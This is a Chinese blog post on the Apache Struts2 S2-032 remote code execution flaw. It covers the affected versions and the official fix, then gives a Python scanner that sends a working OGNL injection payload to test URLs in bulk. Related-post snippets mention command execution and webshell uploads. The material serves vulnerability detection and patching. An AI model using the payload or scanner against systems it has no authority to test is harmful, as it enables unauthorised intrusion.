Apache Struts2任意代码执行漏洞(S2-032)检测程序

最新推荐文章于 2024-07-25 10:46:47 发布
最新推荐文章于 2024-07-25 10:46:47 发布
阅读量2.5k 收藏 1
点赞数
分类专栏: 网络安全专栏 Python 信息安全 WEB应用程序安全 文章标签: 漏洞 struts struts2.0 java exploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/langkew/article/details/51538415
版权

上个月写的一段代码,记录下来以供不时之需。

漏洞概况

2016年4月21日,Struts2官方发布两个安全公告(S2-031,S2-032),其中S2-032(CVE-2016-3081)官方评级为高。Apache Struts 2是世界上最流行的Java Web服务器框架之一。该漏洞的成因是用户开启动态方法调用(Dynamic Method Invocation)的情况下,攻击者能够使用method:前缀执行远程代码。值得一提的是该漏洞是由国内企业安恒信息的员工提交的。

漏洞影响

官方给出的受影响的Struts版本号区间为Struts 2.0.0 - Struts 2.3.28 (2.3.20.2 和 2.3.24.2版本不受影响)。

目前在互联网上已有多个版本的漏洞利用POC在互联网流传,分为命令执行版本与直接写入Web后门的版本。乌云、补天等漏洞报告平台已收到大量网站的相关漏洞报告,其中银行占了很大比例,此漏洞可能会在一段时间内在各行业造成大面积的恶劣影响。

解决方案

Struts官方给出的解决方案是禁用动态方法调用功能,或者升级到Struts 2.3.20.2,2.3.24.2或2.3.28.1。

修改Struts2的配置文件如下:将“struts.enable.DynamicMethodInvocation”的值设置为false,比如:

< constant name="struts.enable.DynamicMethodInvocation" value="false" / >;

2.3.28.1版本Struts下载地址:
https://struts.apache.org/download.cgi#struts23281

上面的文字来自聚锋实验室微信公众号:

扫描关注聚锋实验室

检测程序

import sys,time,os
import requests

def do_check(url):    
    url = url.strip()
    if '?' in url:
        url = url.split('?')[0]
    poc3 = url + "?method:%23_memberAccess%3d%40ognl.OgnlContext+%40DEFAULT_MEMBER_ACCESS%2c%23k%3d+%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23k.print(56956116)%2c%23k.close"

    try:
        result = do_request(poc3)
        if "56956116" in result:
            vuls='!!!WARNING Vulnerable url: '+url
            logfilename = os.path.dirname(os.path.realpath(__file__))+"/log.txt"
            logfile = open(logfilename,"a")
            logfile.write(vuls+"\n\r")
            logfile.close()
            print vuls
        else:
            print '...Not vulnerable: '+url
    except Exception,e:
        print e

def do_request(exp,method="GET"):
    response = None
    if method == "GET":
        response = requests.get(exp, timeout=10) 
    return response.content


def main(path):
    print "Checking Struts2 (S2-032) Remote Code Execution..."
    cnt = 0
    if 'http://' in path or 'https://' in path:
        url=path
        do_check(url)
    else:
        urlfile=open(path,'r')
        for url in urlfile:
            if url.strip():
                cnt += 1
                do_check(url)
        urlfile.close()
    output = os.path.dirname(os.path.realpath(__file__))+"/log.txt"
    if os.path.exists(output):
        print "Scanned urls: %d" % cnt
        print "Output File: "+output

if __name__ == '__main__':
    args = sys.argv
    if len(args) != 2:
        print "Usage: %s [url/file]" % args[0]
        exit()
    main(args[1])
evancss
关注
专栏目录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-048(CVE-2017-9791)
qq_51577576的博客
12-16 1355
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-048(CVE-2017-9791) Apache Struts2 2.3.x 系列启用了struts2-struts1-plugin 插件并且存在 struts2-showcase 目录,其漏洞成因是当ActionMessage接收客户可控的参数数据时,用户可控的值添加到 ActionMessage 并在客户前端展示,导致其进入 getText 函数,最后 message 被当作 ognl 表达式执行,导致任意代码执行
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-046(CVE-2017-5638)
qq_51577576的博客
11-20 848
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-046(CVE-2017-5638) Apache Struts2存在远程代码执行漏洞,攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行
Struts2-032/033/037/devMode漏洞演示环境搭建
乐枕的家
07-29 5119
环境搭建 安装Java(ubuntu自带的openjdk就行) 安装Tomcat apt-get install tomcat7 下载这个含漏洞版本的struts2(已验证) https://pan.baidu.com/s/1nvpkq5z 解压,将apps文件夹下的所有示例(.war)拷贝到Tomcat下(路径默认为/var/lib/tomcat7/webapps/) 启动tomcat servi
apache struts 2 任意代码执行漏洞
weixin_34174132的博客
04-27 220
漏洞检测地址:http://0day.websaas.cn 漏洞利用工具,如下: 漏洞利用,如下: step1 step2 step3 提权思路,如下: 1、开启虚拟终端,执行命令,但是,提示“连接被重置” 2、上传cmd/KB,但是,提示“连接被重置” 3、上传jsp大马提权,但是,我的本地没jsp大马/KB,暂时放一放 略! 4、端口扫描,发现开了...
Struts2 S2-032 漏洞
最新发布
qqbtou007的博客
07-25 139
1.拉取靶场vulapps。
Apache Struts2远程代码执行漏洞(S2-032)复现
qq_36933272的博客
09-01 436
打开struts工具,把数据提交方式改成get,存在S2-045、S2-046漏洞 命令执行ls,查看文件目录,存在key.txt cat key.txt 提交key
墨者学院Apache Struts2远程代码执行漏洞(S2-032)
全村的希望
10-13 393
墨者学院Apache Struts2远程代码执行漏洞(S2-032)
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-032CVE-2016-3081
qq_51577576的博客
11-25 536
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-032CVE-2016-3081Apache Struts 2是世界上最流行的Java Web服务器框架之一。Struts 2上存在高危安全漏洞CVE-2016-3081,S02-32),黑客可以利用漏洞直接执行任意代码,绕过文件限制,上传文件,执行远程命令,控制服务器,直接盗取用户的所有资料,该漏洞广泛影响所有struts版本。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-059(CVE-2019-0230)
qq_51577576的博客
12-14 653
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-059(CVE-2019-0230) 漏洞产生的主要原因是因为Apache Struts框架在强制执行时,会对分配给某些标签属性(如id)的属性值执行二次ognl解析。攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-053(CVE-2017-12611)
qq_51577576的博客
12-12 663
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-053(CVE-2017-12611) Struts2在使用Freemarker模块引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但是由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。 当开发人员在Freemarker标签中使用错误的构造时,可能会导致远程代码执行漏洞
墨者学院-Apache Struts2远程代码执行漏洞(S2-032)复现
JimWu的博客
09-04 705
Apache Struts2远程代码执行漏洞(S2-032)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理:由于启用动态方法调用时,可以通过方法:前缀执行远程代码执行。 1.打开靶场,了解S2-032漏洞原理。 2.构造POC,执行命令ls / %23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,...
Struts2 S2-032漏洞复现
ZJT6666666的博客
01-04 520
Struts2 S2-032漏洞复现
struts2 s2-032漏洞分析
weixin_34277853的博客
03-04 533
0x01Brief Description 最近面试几家公司,很多都问到了s2漏洞的原理,之前调试分析过java反序列化的漏洞,觉得s2漏洞应该不会太难,今天就分析了一下,然后发现其实漏洞的原理不难,但是搭建j2ee调试的环境花了将近半天的时间QAQ. StrutsApache软件基金会(ASF)赞助的一个开源项目,通过采用JavaServlet/JSP技术,实现基...
Apache Struts Showcase App 2.0.0 到 2.3.13(在 2.3.14.3 之前的 Struts 2 中使用)远程代码执行漏洞CVE-2013-1965)
Flag少侠的博客
07-14 9399
打开靶场可以看到有一个输入框,尝试输入一些值提交值作为 name 参数拼接在 URL 后面如果不输入参数直接提交则会得到当前网页的完全路径复制路径打开 K8 工具工具下载pwd=6666使用 S2-016 获取信息成功执行命令获取 flagt=N7T8工具下载https://pan.baidu.com/s/1gAV9uzWZgmC3ojKNeKAjsQ?pwd=6666。
Apache Struts2远程代码执行漏洞(S2-001)复现
oiadkt的博客
05-04 2897
Apache Struts2远程代码执行漏洞(S2-001)复现
Struts2 远程代码执行漏洞S2-001分析
st3pby的博客
01-05 954
首先来了解 OGNL 表达式,OGNL(Object Graphic Navigatino Language)的中文全称为“对象图导航语言”,是应用于Java中的一个开源的功能强大的表达式语言(Expression Language),它被集成在Struts2等框架中,通过简单一致的表达式语法,可以存取对象的任何属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。OGNL进行对象存取操作的API在Ognl.java文件中,分别是getValue、setValue两个方法。
Struts2 远程命令执行漏洞CVE-2020-17530)(S2-061)
归零者的博客
11-22 199
Struts2 远程命令执行漏洞CVE-2020-17530)(S2-061)
Struts2 S2-061 漏洞分析:OGNL表达式注入与远程代码执行
"Apache Struts2S2-061 漏洞是一个严重的远程代码执行漏洞,出现在使用特定tag时的OGNL表达式注入。该漏洞在2020年12月8日被公开,允许攻击者通过构造恶意输入来绕过OGNL沙盒限制,执行任意代码。在分析Poc时,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值